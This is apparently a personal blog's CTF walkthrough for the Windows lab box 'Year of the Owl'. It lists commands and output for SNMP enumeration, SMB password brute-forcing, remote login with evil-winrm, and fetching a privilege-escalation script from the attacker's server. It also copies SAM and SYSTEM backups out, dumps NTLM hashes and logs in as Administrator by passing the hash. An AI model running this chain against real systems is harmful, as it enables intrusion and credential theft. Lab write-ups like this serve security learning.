CTF Year of the Owl

CTF Windows
Created At :
Count:351 Views 👀 :
  1. rustscan
  2. SNMP SCAN
  3. smb crack
  4. Browse the SMB
  5. List smb shares
  6. evil-winrm
  7. Privesc
  8. Dump the hashs
  9. Use the admin hash

rustscan

rustscan -a 10.10.33.184 --ulimit 5000
PORT      STATE SERVICE       REASON
80/tcp    open  http          syn-ack
139/tcp   open  netbios-ssn   syn-ack
443/tcp   open  https         syn-ack
445/tcp   open  microsoft-ds  syn-ack
3389/tcp  open  ms-wbt-server syn-ack
5985/tcp  open  wsman         syn-ack
47001/tcp open  winrm         syn-ack

SNMP SCAN

To find the community.

onesixtyone 10.10.33.184 -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp-onesixtyone.txt


The community is openview.

https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
This mib is used to get the users.

snmpwalk -c openview -v1 10.10.33.184 1.3.6.1.4.1.77.1.2.25


Jareth

smb crack

Now we can crack the smb password with this user.

crackmapexec smb 10.10.33.184 -u Jareth -p /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt


sarah

Browse the SMB

smbclient -L //10.10.33.184 -U Jareth


There is nothing interesting.

List smb shares

python /usr/bin/smbmap.py -R -u "Jareth" -p "sarah" -H 10.10.33.184

evil-winrm

evil-winrm -u Jareth -p sarah -i 10.10.131.77

Privesc

We gonna use powerup.ps1.

On linux:

python -m http.server 8000

On windows:

Invoke-WebRequest -Uri http://10.8.50.167:8000/powerup.ps1 -OutFile powerup.ps1

Checklist:
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation

cd /
cd 'C:$Recycle.Bin'
C:\$Recycle.Bin> dir -force


Inside the directory:

We donwload them.
It was impossible to download them when they was in the recycle bin

copy sam.bak "C:/Users/Jareth/Documents/sam.bak"
copy system.bak "C:/Users/Jareth/Documents/system.bak"

download sam.bak /tmp/sam.bak
download system.bak /tmp/system.bak


I’m moving them in my working directory.

mv /tmp/*.bak .

Dump the hashs

secretsdump.py -sam sam.bak -system system.bak LOCAL

Output:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::

Use the admin hash

evil-winrm -u Administrator -H 6bc99ede9edcfecf9662fb0c0ddcfa7a -i 10.10.131.77

Yeah !

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme